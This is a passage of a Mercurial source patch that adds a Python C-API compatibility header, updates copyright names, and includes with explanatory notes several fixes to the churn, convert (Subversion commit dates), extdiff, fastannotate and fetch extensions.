--- a/contrib/python-zstandard/c-ext/compressor.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressor.c Tue Apr 20 11:01:06 2021 -0400
@@ -619,7 +619,7 @@
goto finally;
}
- Py_SIZE(output) = outBuffer.pos;
+ Py_SET_SIZE(output, outBuffer.pos);
finally:
PyBuffer_Release(&source);
@@ -1659,7 +1659,7 @@
};
void compressor_module_init(PyObject* mod) {
- Py_TYPE(&ZstdCompressorType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressorType, &PyType_Type);
if (PyType_Ready(&ZstdCompressorType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/compressoriterator.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/compressoriterator.c Tue Apr 20 11:01:06 2021 -0400
@@ -228,7 +228,7 @@
};
void compressoriterator_module_init(PyObject* mod) {
- Py_TYPE(&ZstdCompressorIteratorType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdCompressorIteratorType, &PyType_Type);
if (PyType_Ready(&ZstdCompressorIteratorType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/decompressionreader.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/decompressionreader.c Tue Apr 20 11:01:06 2021 -0400
@@ -774,7 +774,7 @@
void decompressionreader_module_init(PyObject* mod) {
/* TODO make reader a sub-class of io.RawIOBase */
- Py_TYPE(&ZstdDecompressionReaderType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdDecompressionReaderType, &PyType_Type);
if (PyType_Ready(&ZstdDecompressionReaderType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/decompressionwriter.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/decompressionwriter.c Tue Apr 20 11:01:06 2021 -0400
@@ -288,7 +288,7 @@
};
void decompressionwriter_module_init(PyObject* mod) {
- Py_TYPE(&ZstdDecompressionWriterType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdDecompressionWriterType, &PyType_Type);
if (PyType_Ready(&ZstdDecompressionWriterType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/decompressobj.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/decompressobj.c Tue Apr 20 11:01:06 2021 -0400
@@ -195,7 +195,7 @@
};
void decompressobj_module_init(PyObject* module) {
- Py_TYPE(&ZstdDecompressionObjType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdDecompressionObjType, &PyType_Type);
if (PyType_Ready(&ZstdDecompressionObjType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/decompressor.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/decompressor.c Tue Apr 20 11:01:06 2021 -0400
@@ -1811,7 +1811,7 @@
};
void decompressor_module_init(PyObject* mod) {
- Py_TYPE(&ZstdDecompressorType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdDecompressorType, &PyType_Type);
if (PyType_Ready(&ZstdDecompressorType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/decompressoriterator.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/decompressoriterator.c Tue Apr 20 11:01:06 2021 -0400
@@ -242,7 +242,7 @@
};
void decompressoriterator_module_init(PyObject* mod) {
- Py_TYPE(&ZstdDecompressorIteratorType) = &PyType_Type;
+ Py_SET_TYPE(&ZstdDecompressorIteratorType, &PyType_Type);
if (PyType_Ready(&ZstdDecompressorIteratorType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/frameparams.c Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/frameparams.c Tue Apr 20 11:01:06 2021 -0400
@@ -128,7 +128,7 @@
};
void frameparams_module_init(PyObject* mod) {
- Py_TYPE(&FrameParametersType) = &PyType_Type;
+ Py_SET_TYPE(&FrameParametersType, &PyType_Type);
if (PyType_Ready(&FrameParametersType) < 0) {
return;
}
--- a/contrib/python-zstandard/c-ext/python-zstandard.h Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/python-zstandard/c-ext/python-zstandard.h Tue Apr 20 11:01:06 2021 -0400
@@ -9,6 +9,7 @@
#define PY_SSIZE_T_CLEAN
#include <Python.h>
#include "structmember.h"
+#include <pythoncapi_compat.h>
#define ZSTD_STATIC_LINKING_ONLY
#define ZDICT_STATIC_LINKING_ONLY
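
The Py_SET_SIZE() and Py_SET_TYPE() rewrites above are needed because assignments such as Py_SIZE(output) = n only compile while Py_SIZE() is a macro expanding to an lvalue; bpo-39573 added the setter functions in Python 3.9, and newer CPython releases turn the accessor macros into functions, so the assignment form stops compiling. On Pythons that predate the setters, they come from the vendored compatibility header added below. Quoting the change at the top of this file:

    Py_SIZE(output) = outBuffer.pos;        /* breaks on newer CPython */
    Py_SET_SIZE(output, outBuffer.pos);     /* works everywhere with the shim */
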
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,283 @@
+// Header file providing new functions of the Python C API to old Python
+// versions.
+//
+// File distributed under the MIT license.
+//
+// Homepage:
+// https://github.com/pythoncapi/pythoncapi_compat
+//
+// Latest version:
+// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h
+
+#ifndef PYTHONCAPI_COMPAT
+#define PYTHONCAPI_COMPAT
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+#include <Python.h>
+#include "frameobject.h" // PyFrameObject, PyFrame_GetBack()
+
+
+/* VC 2008 doesn't know about the inline keyword. */
+#if defined(_MSC_VER) && _MSC_VER < 1900
+#define inline __forceinline
+#endif
+
+// Cast argument to PyObject* type.
+#ifndef _PyObject_CAST
+# define _PyObject_CAST(op) ((PyObject*)(op))
+#endif
+
+
+// bpo-42262 added Py_NewRef() to Python 3.10.0a3
+#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef)
+static inline PyObject* _Py_NewRef(PyObject *obj)
+{
+ Py_INCREF(obj);
+ return obj;
+}
+#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj))
+#endif
+
+
+// bpo-42262 added Py_XNewRef() to Python 3.10.0a3
+#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef)
+static inline PyObject* _Py_XNewRef(PyObject *obj)
+{
+ Py_XINCREF(obj);
+ return obj;
+}
+#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj))
+#endif
+
+
+// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT)
+static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt)
+{
+ ob->ob_refcnt = refcnt;
+}
+#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt)
+#endif
+
+
+// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE)
+static inline void
+_Py_SET_TYPE(PyObject *ob, PyTypeObject *type)
+{
+ ob->ob_type = type;
+}
+#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type)
+#endif
+
+
+// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE)
+static inline void
+_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size)
+{
+ ob->ob_size = size;
+}
+#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size)
+#endif
+
+
+// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyCodeObject*
+PyFrame_GetCode(PyFrameObject *frame)
+{
+ PyCodeObject *code;
+ assert(frame != NULL);
+ code = frame->f_code;
+ assert(code != NULL);
+ Py_INCREF(code);
+ return code;
+}
+#endif
+
+static inline PyCodeObject*
+_PyFrame_GetCodeBorrow(PyFrameObject *frame)
+{
+ PyCodeObject *code = PyFrame_GetCode(frame);
+ Py_DECREF(code);
+ return code; // borrowed reference
+}
+
+
+// bpo-40421 added PyFrame_GetBack() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyFrameObject*
+PyFrame_GetBack(PyFrameObject *frame)
+{
+ PyFrameObject *back;
+ assert(frame != NULL);
+ back = frame->f_back;
+ Py_XINCREF(back);
+ return back;
+}
+#endif
+
+static inline PyFrameObject*
+_PyFrame_GetBackBorrow(PyFrameObject *frame)
+{
+ PyFrameObject *back = PyFrame_GetBack(frame);
+ Py_XDECREF(back);
+ return back; // borrowed reference
+}
+
+
+// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline PyInterpreterState *
+PyThreadState_GetInterpreter(PyThreadState *tstate)
+{
+ assert(tstate != NULL);
+ return tstate->interp;
+}
+#endif
+
+
+// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyFrameObject*
+PyThreadState_GetFrame(PyThreadState *tstate)
+{
+ PyFrameObject *frame;
+ assert(tstate != NULL);
+ frame = tstate->frame;
+ Py_XINCREF(frame);
+ return frame;
+}
+#endif
+
+static inline PyFrameObject*
+_PyThreadState_GetFrameBorrow(PyThreadState *tstate)
+{
+ PyFrameObject *frame = PyThreadState_GetFrame(tstate);
+ Py_XDECREF(frame);
+ return frame; // borrowed reference
+}
+
+
+// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline PyInterpreterState *
+PyInterpreterState_Get(void)
+{
+ PyThreadState *tstate;
+ PyInterpreterState *interp;
+
+ tstate = PyThreadState_GET();
+ if (tstate == NULL) {
+ Py_FatalError("GIL released (tstate is NULL)");
+ }
+ interp = tstate->interp;
+ if (interp == NULL) {
+ Py_FatalError("no current interpreter");
+ }
+ return interp;
+}
+#endif
+
+
+// bpo-39947 added PyThreadState_GetID() to Python 3.9.0a6
+#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6
+static inline uint64_t
+PyThreadState_GetID(PyThreadState *tstate)
+{
+ assert(tstate != NULL);
+ return tstate->id;
+}
+#endif
+
+
+// bpo-37194 added PyObject_CallNoArgs() to Python 3.9.0a1
+#if PY_VERSION_HEX < 0x030900A1
+static inline PyObject*
+PyObject_CallNoArgs(PyObject *func)
+{
+ return PyObject_CallFunctionObjArgs(func, NULL);
+}
+#endif
+
+
+// bpo-39245 made PyObject_CallOneArg() public (previously called
+// _PyObject_CallOneArg) in Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4
+static inline PyObject*
+PyObject_CallOneArg(PyObject *func, PyObject *arg)
+{
+ return PyObject_CallFunctionObjArgs(func, arg, NULL);
+}
+#endif
+
+
+// bpo-40024 added PyModule_AddType() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline int
+PyModule_AddType(PyObject *module, PyTypeObject *type)
+{
+ const char *name, *dot;
+
+ if (PyType_Ready(type) < 0) {
+ return -1;
+ }
+
+ // inline _PyType_Name()
+ name = type->tp_name;
+ assert(name != NULL);
+ dot = strrchr(name, '.');
+ if (dot != NULL) {
+ name = dot + 1;
+ }
+
+ Py_INCREF(type);
+ if (PyModule_AddObject(module, name, (PyObject *)type) < 0) {
+ Py_DECREF(type);
+ return -1;
+ }
+
+ return 0;
+}
+#endif
+
+
+// bpo-40241 added PyObject_GC_IsTracked() to Python 3.9.0a6.
+// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2.
+#if PY_VERSION_HEX < 0x030900A6
+static inline int
+PyObject_GC_IsTracked(PyObject* obj)
+{
+ return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj));
+}
+#endif
+
+// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6.
+// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final.
+#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0
+static inline int
+PyObject_GC_IsFinalized(PyObject *obj)
+{
+ return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1));
+}
+#endif
+
+
+// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE)
+static inline int
+_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) {
+ return ob->ob_type == type;
+}
+#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type)
+#endif
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif // PYTHONCAPI_COMPAT
--- a/contrib/win32/ReadMe.html Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/win32/ReadMe.html Tue Apr 20 11:01:06 2021 -0400
@@ -140,7 +140,7 @@
</p>
<p>
- Mercurial is Copyright 2005-2021 Matt Mackall and others.
+ Mercurial is Copyright 2005-2021 Olivia Mackall and others.
</p>
<p>
--- a/contrib/win32/hg.bat Thu Mar 25 19:06:28 2021 -0400
+++ b/contrib/win32/hg.bat Tue Apr 20 11:01:06 2021 -0400
@@ -4,6 +4,8 @@
setlocal
set HG=%~f0
+set PYTHONLEGACYWINDOWSSTDIO=1
+
rem Use a full path to Python (relative to this script) if it exists,
rem as the standard Python install does not put python.exe on the PATH...
rem Otherwise, expect that python.exe can be found on the PATH.
--- a/doc/Makefile Thu Mar 25 19:06:28 2021 -0400
+++ b/doc/Makefile Tue Apr 20 11:01:06 2021 -0400
@@ -6,7 +6,14 @@
PREFIX=/usr/local
MANDIR=$(PREFIX)/share/man
INSTALL=install -m 644
-PYTHON?=python
+# Default to Python 3.
+#
+# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is.
+ifeq ($(OS),Windows_NT)
+PYTHON?=py -3
+else
+PYTHON?=python3
+endif
RSTARGS=
export HGENCODING=UTF-8
--- a/doc/gendoc.py Thu Mar 25 19:06:28 2021 -0400
+++ b/doc/gendoc.py Tue Apr 20 11:01:06 2021 -0400
@@ -31,6 +31,7 @@
commands,
encoding,
extensions,
+ fancyopts,
help,
minirst,
pycompat,
@@ -86,6 +87,8 @@
if b'\n' in desc:
# only remove line breaks and indentation
desc = b' '.join(l.lstrip() for l in desc.split(b'\n'))
+ if isinstance(default, fancyopts.customopt):
+ default = default.getdefaultvalue()
if default:
default = stringutil.forcebytestr(default)
desc += _(b" (default: %s)") % default
@@ -314,7 +317,12 @@
ui.write(b"\n")
# aliases
if d[b'aliases']:
- ui.write(_(b" aliases: %s\n\n") % b" ".join(d[b'aliases']))
+ # Note the empty comment; this is required to separate this
+ # (which should be a blockquote) from any preceding things (such
+ # as a definition list).
+ ui.write(
+ _(b"..\n\n aliases: %s\n\n") % b" ".join(d[b'aliases'])
+ )
def allextensionnames():
@@ -327,6 +335,11 @@
doc = encoding.strtolocal(sys.argv[1])
ui = uimod.ui.load()
+ # Trigger extensions to load. This is disabled by default because it uses
+ # the current user's configuration, which is often not what is wanted.
+ if encoding.environ.get(b'GENDOC_LOAD_CONFIGURED_EXTENSIONS', b'0') != b'0':
+ extensions.loadall(ui)
+
if doc == b'hg.1.gendoc':
showdoc(ui)
else:
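
The first gendoc.py hunk unwraps fancyopts.customopt defaults so the generated option help shows the underlying value rather than the wrapper object. A minimal sketch of that unwrapping, using a hypothetical customopt subclass (the subclass name and default value are illustrative, not part of this patch):

    from mercurial import fancyopts

    class listappendopt(fancyopts.customopt):
        # customopt is abstract: subclasses provide newstate(); the value
        # handed to __init__ is what getdefaultvalue() returns.
        def newstate(self, oldstate, newparam, abort):
            return oldstate + [newparam]

    default = listappendopt([b'rev'])
    if isinstance(default, fancyopts.customopt):
        default = default.getdefaultvalue()  # -> [b'rev'], ready to render
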
--- a/doc/runrst Thu Mar 25 19:06:28 2021 -0400
+++ b/doc/runrst Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# runrst - register custom roles and run correct writer
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2010 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hg Thu Mar 25 19:06:28 2021 -0400
+++ b/hg Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# mercurial - scalable distributed SCM
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgdemandimport/demandimportpy2.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgdemandimport/demandimportpy2.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# demandimport.py - global demand-loading of modules for Mercurial
#
-# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/absorb.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/absorb.py Tue Apr 20 11:01:06 2021 -0400
@@ -102,6 +102,9 @@
class emptyfilecontext(object):
"""minimal filecontext representing an empty file"""
+ def __init__(self, repo):
+ self._repo = repo
+
def data(self):
return b''
@@ -212,7 +215,7 @@
if path in pctx:
fctxs.append(pctx[path])
else:
- fctxs.append(emptyfilecontext())
+ fctxs.append(emptyfilecontext(pctx.repo()))
fctxs.reverse()
# note: we rely on a property of hg: filerev is not reused for linear
--- a/hgext/blackbox.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/blackbox.py Tue Apr 20 11:01:06 2021 -0400
@@ -38,7 +38,7 @@
[blackbox]
# Include nanoseconds in log entries with %f (see Python function
# datetime.datetime.strftime)
- date-format = '%Y-%m-%d @ %H:%M:%S.%f'
+ date-format = %Y-%m-%d @ %H:%M:%S.%f
"""
--- a/hgext/churn.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/churn.py Tue Apr 20 11:01:06 2021 -0400
@@ -38,11 +38,16 @@
def changedlines(ui, repo, ctx1, ctx2, fmatch):
added, removed = 0, 0
diff = b''.join(patch.diff(repo, ctx1.node(), ctx2.node(), fmatch))
+ inhunk = False
for l in diff.split(b'\n'):
- if l.startswith(b"+") and not l.startswith(b"+++ "):
+ if inhunk and l.startswith(b"+"):
added += 1
- elif l.startswith(b"-") and not l.startswith(b"--- "):
+ elif inhunk and l.startswith(b"-"):
removed += 1
+ elif l.startswith(b"@"):
+ inhunk = True
+ elif l.startswith(b"d"):
+ inhunk = False
return (added, removed)
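
The rewritten loop counts only +/- lines that fall inside a hunk, so file headers and the diff lines that separate files no longer skew the totals. A standalone sketch of the counting logic (not the extension code itself):

    diff = (
        b'diff --git a/f b/f\n'
        b'--- a/f\n'
        b'+++ b/f\n'
        b'@@ -1,1 +1,2 @@\n'
        b' unchanged\n'
        b'+added\n'
    )
    inhunk = False
    added = removed = 0
    for l in diff.split(b'\n'):
        if inhunk and l.startswith(b'+'):
            added += 1
        elif inhunk and l.startswith(b'-'):
            removed += 1
        elif l.startswith(b'@'):  # a hunk header opens a hunk
            inhunk = True
        elif l.startswith(b'd'):  # a 'diff ...' line starts the next file
            inhunk = False
    # added == 1, removed == 0; the '+++ b/f' header is not miscounted
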
--- a/hgext/convert/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# convert.py Foreign SCM converter
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -491,6 +491,22 @@
:convert.skiptags: does not convert tags from the source repo to the target
repo. The default is False.
+
+ Subversion Destination
+ ######################
+
+ Original commit dates are not preserved by default.
+
+ :convert.svn.dangerous-set-commit-dates: preserve original commit dates,
+ forcefully setting ``svn:date`` revision properties. This option is
+ DANGEROUS and may break some subversion functionality for the resulting
+ repository (e.g. filtering revisions with date ranges in ``svn log``),
+ as original commit dates are not guaranteed to be monotonically
+ increasing.
+
+ For commit date setting to work, the destination repository must have the
+ ``pre-revprop-change`` hook configured to allow setting of ``svn:date``
+ revision properties. See Subversion documentation for more details.
"""
return convcmd.convert(ui, src, dest, revmapfile, **opts)
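
Assuming the option name documented above, a conversion that preserves dates would enable it on the command line, for example (repository names are placeholders):

    hg convert --config convert.svn.dangerous-set-commit-dates=true hg-repo svn-repo

The destination must accept ``svn:date`` revprop changes through its ``pre-revprop-change`` hook; as the subversion.py hunks below show, the sink installs a suitable hook itself when it creates the destination repository.
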
--- a/hgext/convert/common.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/common.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# common.py - common code for the convert extension
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/convert/convcmd.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/convcmd.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# convcmd - convert extension commands definition
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/convert/cvs.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/cvs.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# cvs.py: CVS conversion code inspired by hg-cvs-import and git-cvsimport
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/convert/darcs.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/darcs.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# darcs.py - darcs support for the convert extension
#
-# Copyright 2007-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2007-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/convert/git.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/git.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# git.py - git support for the convert extension
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -247,7 +247,8 @@
b'\n'.join(line.strip() for line in content.split(b'\n')),
)
for sec in c.sections():
- s = c[sec]
+ # turn the config object into a real dict
+ s = dict(c.items(sec))
if b'url' in s and b'path' in s:
self.submodules.append(submodule(s[b'path'], b'', s[b'url']))
--- a/hgext/convert/hg.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/hg.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# hg.py - hg backend for convert extension
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/convert/subversion.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/convert/subversion.py Tue Apr 20 11:01:06 2021 -0400
@@ -97,6 +97,17 @@
return s.decode(fsencoding).encode('utf-8')
+def formatsvndate(date):
+ return dateutil.datestr(date, b'%Y-%m-%dT%H:%M:%S.000000Z')
+
+
+def parsesvndate(s):
+ # Example SVN datetime. Includes microseconds.
+ # ISO-8601 conformant
+ # '2007-01-04T17:35:00.902377Z'
+ return dateutil.parsedate(s[:19] + b' UTC', [b'%Y-%m-%dT%H:%M:%S'])
+
+
class SvnPathNotFound(Exception):
pass
@@ -1158,12 +1169,7 @@
continue
paths.append((path, ent))
- # Example SVN datetime. Includes microseconds.
- # ISO-8601 conformant
- # '2007-01-04T17:35:00.902377Z'
- date = dateutil.parsedate(
- date[:19] + b" UTC", [b"%Y-%m-%dT%H:%M:%S"]
- )
+ date = parsesvndate(date)
if self.ui.configbool(b'convert', b'localtimezone'):
date = makedatetimestamp(date[0])
@@ -1380,7 +1386,7 @@
return logstream(stdout)
-pre_revprop_change = b'''#!/bin/sh
+pre_revprop_change_template = b'''#!/bin/sh
REPOS="$1"
REV="$2"
@@ -1388,15 +1394,26 @@
PROPNAME="$4"
ACTION="$5"
-if [ "$ACTION" = "M" -a "$PROPNAME" = "svn:log" ]; then exit 0; fi
-if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-branch" ]; then exit 0; fi
-if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-rev" ]; then exit 0; fi
+%(rules)s
echo "Changing prohibited revision property" >&2
exit 1
'''
+def gen_pre_revprop_change_hook(prop_actions_allowed):
+ rules = []
+ for action, propname in prop_actions_allowed:
+ rules.append(
+ (
+ b'if [ "$ACTION" = "%s" -a "$PROPNAME" = "%s" ]; '
+ b'then exit 0; fi'
+ )
+ % (action, propname)
+ )
+ return pre_revprop_change_template % {b'rules': b'\n'.join(rules)}
+
+
class svn_sink(converter_sink, commandline):
commit_re = re.compile(br'Committed revision (\d+).', re.M)
uuid_re = re.compile(br'Repository UUID:\s*(\S+)', re.M)
@@ -1470,9 +1487,20 @@
self.is_exec = None
if created:
+ prop_actions_allowed = [
+ (b'M', b'svn:log'),
+ (b'A', b'hg:convert-branch'),
+ (b'A', b'hg:convert-rev'),
+ ]
+
+ if self.ui.configbool(
+ b'convert', b'svn.dangerous-set-commit-dates'
+ ):
+ prop_actions_allowed.append((b'M', b'svn:date'))
+
hook = os.path.join(created, b'hooks', b'pre-revprop-change')
fp = open(hook, b'wb')
- fp.write(pre_revprop_change)
+ fp.write(gen_pre_revprop_change_hook(prop_actions_allowed))
fp.close()
util.setflags(hook, False, True)
@@ -1667,6 +1695,23 @@
revprop=True,
revision=rev,
)
+
+ if self.ui.configbool(
+ b'convert', b'svn.dangerous-set-commit-dates'
+ ):
+ # Subversion always uses UTC to represent date and time
+ date = dateutil.parsedate(commit.date)
+ date = (date[0], 0)
+
+ # The only way to set the date and time of an svn commit is to run
+ # propset after the commit is done
+ self.run(
+ b'propset',
+ b'svn:date',
+ formatsvndate(date),
+ revprop=True,
+ revision=rev,
+ )
+
for parent in parents:
self.addchild(parent, rev)
return self.revid(rev)
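
Taken together, the helpers above let svn:date round-trip at whole-second precision: parsesvndate() drops the fractional part and formatsvndate() always writes zero microseconds. A quick sketch of the expected behavior (function names from this patch, values illustrative):

    date = parsesvndate(b'2007-01-04T17:35:00.902377Z')
    # -> (1167932100, 0): seconds since the epoch, UTC offset zero
    assert formatsvndate(date) == b'2007-01-04T17:35:00.000000Z'

For the default set of allowed property actions, gen_pre_revprop_change_hook() expands the template to one guard per (action, property) pair, each of the form quoted from the template above:

    if [ "$ACTION" = "M" -a "$PROPNAME" = "svn:log" ]; then exit 0; fi
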
--- a/hgext/extdiff.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/extdiff.py Tue Apr 20 11:01:06 2021 -0400
@@ -91,7 +91,7 @@
from mercurial.i18n import _
from mercurial.node import (
- nullid,
+ nullrev,
short,
)
from mercurial import (
@@ -565,18 +565,18 @@
repo, [from_rev] + [to_rev], b'nowarn'
)
ctx1a = scmutil.revsingle(repo, from_rev, None)
- ctx1b = repo[nullid]
+ ctx1b = repo[nullrev]
ctx2 = scmutil.revsingle(repo, to_rev, None)
else:
ctx1a, ctx2 = scmutil.revpair(repo, revs)
if not revs:
ctx1b = repo[None].p2()
else:
- ctx1b = repo[nullid]
+ ctx1b = repo[nullrev]
# Disable 3-way merge if there is only one parent
if do3way:
- if ctx1b.node() == nullid:
+ if ctx1b.rev() == nullrev:
do3way = False
matcher = scmutil.match(ctx2, pats, opts)
--- a/hgext/fastannotate/protocol.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/fastannotate/protocol.py Tue Apr 20 11:01:06 2021 -0400
@@ -20,6 +20,9 @@
wireprotov1peer,
wireprotov1server,
)
+from mercurial.utils import (
+ urlutil,
+)
from . import context
# common
@@ -151,9 +154,9 @@
def annotatepeer(repo):
ui = repo.ui
- remotepath = ui.expandpath(
- ui.config(b'fastannotate', b'remotepath', b'default')
- )
+ remotedest = ui.config(b'fastannotate', b'remotepath', b'default')
+ r = urlutil.get_unique_pull_path(b'fastannotate', repo, ui, remotedest)
+ remotepath = r[0]
peer = hg.peer(ui, {}, remotepath)
try:
--- a/hgext/fetch.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/fetch.py Tue Apr 20 11:01:06 2021 -0400
@@ -19,9 +19,11 @@
lock,
pycompat,
registrar,
- util,
)
-from mercurial.utils import dateutil
+from mercurial.utils import (
+ dateutil,
+ urlutil,
+)
release = lock.release
cmdtable = {}
@@ -107,10 +109,9 @@
)
)
- other = hg.peer(repo, opts, ui.expandpath(source))
- ui.status(
- _(b'pulling from %s\n') % util.hidepassword(ui.expandpath(source))
